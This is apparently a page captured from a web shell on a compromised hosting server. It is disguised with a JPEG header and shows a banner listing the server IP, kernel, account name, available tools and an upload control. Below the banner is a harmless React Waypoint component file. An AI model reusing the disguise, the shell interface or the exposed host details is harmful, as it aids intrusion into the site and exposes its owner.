ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.135 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/@restart/ui/esm/ |
Upload File : |
const _excluded = ["renderComponent", "onPositionChange"]; function _objectWithoutPropertiesLoose(source, excluded) { if (source == null) return {}; var target = {}; var sourceKeys = Object.keys(source); var key, i; for (i = 0; i < sourceKeys.length; i++) { key = sourceKeys[i]; if (excluded.indexOf(key) >= 0) continue; target[key] = source[key]; } return target; } import useCallbackRef from '@restart/hooks/useCallbackRef'; import * as React from 'react'; import useWaypoint, { Position } from './useWaypoint'; import { jsx as _jsx } from "react/jsx-runtime"; export { Position }; const defaultRenderComponent = ref => /*#__PURE__*/_jsx("span", { ref: ref, style: { fontSize: 0 } }); /** * A component that tracks when it enters or leaves the viewport. Implemented * using IntersectionObserver, polyfill may be required for older browsers. */ function Waypoint(_ref) { let { renderComponent = defaultRenderComponent, onPositionChange } = _ref, options = _objectWithoutPropertiesLoose(_ref, _excluded); const [element, setElement] = useCallbackRef(); useWaypoint(element, onPositionChange, options); return renderComponent(setElement); } export default Waypoint;